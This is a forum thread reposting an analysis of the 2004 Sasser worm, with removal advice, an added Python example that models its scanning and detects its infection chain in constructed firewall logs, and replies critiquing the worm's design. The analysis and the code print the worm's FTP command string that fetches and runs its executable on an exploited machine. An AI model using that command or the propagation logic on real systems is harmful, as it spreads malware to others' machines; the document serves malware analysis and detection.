Full Version: Sasser Worm Analysis
Paul
URL
http://www.lurhq.com/sasser.html

Release Date
May 1, 2004

Summary
A new worm called "Sasser" has been found spreading in the wild.

Analysis
The worm utilizes the MS04-011 LSASS exploit released by "houseofdabus" on Thursday, April 29, 2004. The worm executable was compiled on Friday, April 30, 2004 at 19:23:16 (timezone unknown).
When executed, the worm:

Installs itself to %WINDIR% as avserve.exe
Adds the following registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
avserve.exe -> C:\%WINDIR%\avserve.exe

Creates a Mutex "Jobaka31" to ensure only one copy of the worm runs in memory
Spawns a mini-FTP server on TCP port 5554 to deliver the worm executable to exploited systems
Spawns 128 threads to scan for and exploit vulnerable systems
Calls API method AbortSystemShutdown to prevent the system from rebooting
Sleeps for 3 seconds then loops back to the AbortSystemShutdown call
The scanner threads work as described below:

The thread attempts to determine the local subnet address
A target IP to exploit is generated:
50% of the time it will attempt to exploit a completely random IP address
25% of the time it will attempt to exploit a random address within the same first octet of the local subnet
25% of the time it will attempt to exploit a random address within the same first and second octets of the local subnet
If successful, the LSASS exploit will open a shell on the remote system on TCP port 9996
The worm will connect to this port and attempt to send the following commands:

echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]_up.exe&echo off&del cmd.ftp&echo on

This will copy the worm executable to the target machine, where it will run and begin to spread
The thread sleeps for 250 milliseconds, then repeats the entire process
Removal
Use the task manager to kill the avserve.exe process, then delete the HKLM\Software\Microsoft\Windows\CurrentVersion\Run\avserve.exe registry key. It may not be possible to run Windows Update to install the patch before the machine is compromised again, similar to what Windows users experienced with the Blaster worm. Block TCP port 445, then patch the system for MS04-011, or download and install the patches from a CD-ROM while offline.

More detailed removal instructions are available from Microsoft at http://www.microsoft.com/security/incident/sasser.asp
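The scanner-thread target selection and the 445 -> 9996 -> 5554 infection exchange described in the analysis above, worked as a Python example added here (not part of the original post or the LURHQ write-up). The port numbers and the command string come from the analysis; the firewall log format, the log lines, the filled-in IP addresses and the `12345_up.exe` filename are constructed for the example, and the log detector assumes each stage of the chain is visible as an allowed TCP connection in that log.

```python
import random
import re
from collections import defaultdict

# Ports taken from the analysis above: the LSASS exploit goes over SMB
# (TCP/445), the exploit binds a shell on TCP/9996, and the worm's
# mini-FTP server listens on TCP/5554 on the infecting host.
SMB_PORT = 445
SHELL_PORT = 9996
FTP_PORT = 5554


def pick_target(local_ip, rng):
    """Generate one target the way the analysis describes the scanner thread:
    50% fully random, 25% sharing the local first octet, 25% sharing the
    local first two octets. Returns (branch, dotted_ip); the branch label is
    kept so callers can measure locality without guessing from the address."""
    a, b, _, _ = (int(x) for x in local_ip.split("."))
    r = rng.random()
    if r < 0.5:
        octets = [rng.randint(1, 254), rng.randint(0, 255),
                  rng.randint(0, 255), rng.randint(1, 254)]
        branch = "random"
    elif r < 0.75:
        octets = [a, rng.randint(0, 255), rng.randint(0, 255), rng.randint(1, 254)]
        branch = "local8"
    else:
        octets = [a, b, rng.randint(0, 255), rng.randint(1, 254)]
        branch = "local16"
    return branch, ".".join(str(o) for o in octets)


def scan_locality(local_ip, n, seed=0):
    """Fraction of n generated targets per branch (seeded, so reproducible).
    Shows why a single infected host hammers its own /16 and /8."""
    rng = random.Random(seed)
    counts = defaultdict(int)
    for _ in range(n):
        branch, _ = pick_target(local_ip, rng)
        counts[branch] += 1
    return {k: v / n for k, v in counts.items()}


# Hypothetical firewall log format used for this example (constructed):
# "<timestamp> <src>:<sport> -> <dst>:<dport> TCP <ALLOW|DENY>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) TCP (?P<action>ALLOW|DENY)$")


def find_infection_chains(lines):
    """Return (attacker, victim) pairs that completed the full Sasser sequence:
    attacker -> victim:445 (exploit), attacker -> victim:9996 (shell),
    then victim -> attacker:5554 (worm fetched from the mini-FTP server).
    A lone SMB session or a blocked 9996 connection never reaches stage 3."""
    stage = defaultdict(int)  # (attacker, victim) -> highest stage seen
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["action"] != "ALLOW":
            continue
        src, dst, dport = m["src"], m["dst"], int(m["dport"])
        if dport == SMB_PORT:
            stage[(src, dst)] = max(stage[(src, dst)], 1)
        elif dport == SHELL_PORT and stage[(src, dst)] == 1:
            stage[(src, dst)] = 2
        elif dport == FTP_PORT and stage[(dst, src)] == 2:
            # the victim is the source here, connecting back to the attacker
            stage[(dst, src)] = 3
            hits.append((dst, src))
    return hits


def parse_dropper_command(cmd):
    """Pull the infecting host, FTP port and payload name out of the command
    string the worm sends to the 9996 shell; None if either part is absent."""
    open_m = re.search(r"echo open (\d+(?:\.\d+){3}) (\d+)>>cmd\.ftp", cmd)
    get_m = re.search(r"echo get (\S+?)>>cmd\.ftp", cmd)
    if not open_m or not get_m:
        return None
    return open_m.group(1), int(open_m.group(2)), get_m.group(1)


# Constructed sample data (not real traffic): one completed infection of
# 10.1.7.9 from 10.1.2.3, one attempt on 10.1.7.10 stopped at the shell
# port by filtering, and an unrelated SMB session from 10.1.5.5.
SAMPLE_LOG = """\
2004-05-01T19:30:01 10.1.2.3:1034 -> 10.1.7.9:445 TCP ALLOW
2004-05-01T19:30:02 10.1.2.3:1035 -> 10.1.7.9:9996 TCP ALLOW
2004-05-01T19:30:03 10.1.7.9:1040 -> 10.1.2.3:5554 TCP ALLOW
2004-05-01T19:30:04 10.1.2.3:1036 -> 10.1.7.10:445 TCP ALLOW
2004-05-01T19:30:05 10.1.2.3:1037 -> 10.1.7.10:9996 TCP DENY
2004-05-01T19:30:06 10.1.5.5:1050 -> 10.1.7.9:445 TCP ALLOW
"""

# The command from the analysis with its placeholders filled in (constructed).
SAMPLE_CMD = ("echo off&echo open 10.1.2.3 5554>>cmd.ftp&echo anonymous>>cmd.ftp"
              "&echo user&echo bin>>cmd.ftp&echo get 12345_up.exe>>cmd.ftp"
              "&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&12345_up.exe"
              "&echo off&del cmd.ftp&echo on")

if __name__ == "__main__":
    print(find_infection_chains(SAMPLE_LOG.splitlines()))
    print(parse_dropper_command(SAMPLE_CMD))
    print(scan_locality("10.1.2.3", 20000, seed=1))
```

The detector only reports chains that reached the 5554 fetch, so a 9996 connection dropped by filtering (as happened to 10.1.7.10 in the sample) shows up as nothing; report stage 2 as well if you want attempted infections, and keep in mind that the 445 stage alone is indistinguishable from ordinary SMB traffic.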

Nick
Monday will be a bad day for network security in big firms...
eddy
QUOTE (Nick @ May 2 2004, 08:50 AM)
Monday will be a bad day for network security in big firms...

I hope not. I mean, the patch has only been out for what, 3 weeks? You would think that would be enough time for people to patch up.
devon
It wasn't. I just have to take the results I had yesterday: 5-10 domain hosting machines in <1 hour... Shitty worm, lets the vuln die now... that sucks...

dev'
strasharo
Curse on the damn worms.
tweakz20
Doesn't get past my fancy routers.

Congrats to the creator for ruining all of our fun.
Killaloop
One of the lamest worms ever made.
Uses stupid ways to transfer files.
Transfers stupid files and often fails because of TCP filtering.
xcopy would have done all this without any FTP client.
And also, compromised machines have 10 or more of these xxxx_up.exe files in system32.
What's the use of this worm anyhow? It only spreads, doesn't even close the hole and uses no backdoor. All just to wake up the lazy admins, I guess.
jimmy
You'd start thinking people are hired by MS to make such worms.
B3T4
You can all call worms lame and badly coded or whatever, but none of you made this worm. LOL, I bet you would be overjoyed if this was your worm.
Killaloop
QUOTE (B3T4 @ May 3 2004, 01:43 PM)
You can all call worms lame and badly coded or whatever, but none of you made this worm. LOL, I bet you would be overjoyed if this was your worm.

Writing a worm for an existing and absolutely working exploit, where you don't need to do anything, in such a simple and ineffective way is what I call lame, yes.
This way every 0815 coder can code a worm. I would still have used xcopy to transfer my files; he made it even more complicated for nothing.
Not patching the compromised host, dropping 1000s of files, and it spreads rather slowly because of the TCP transfer.
This exploit had the potential for a much nicer worm, not such a simple thing.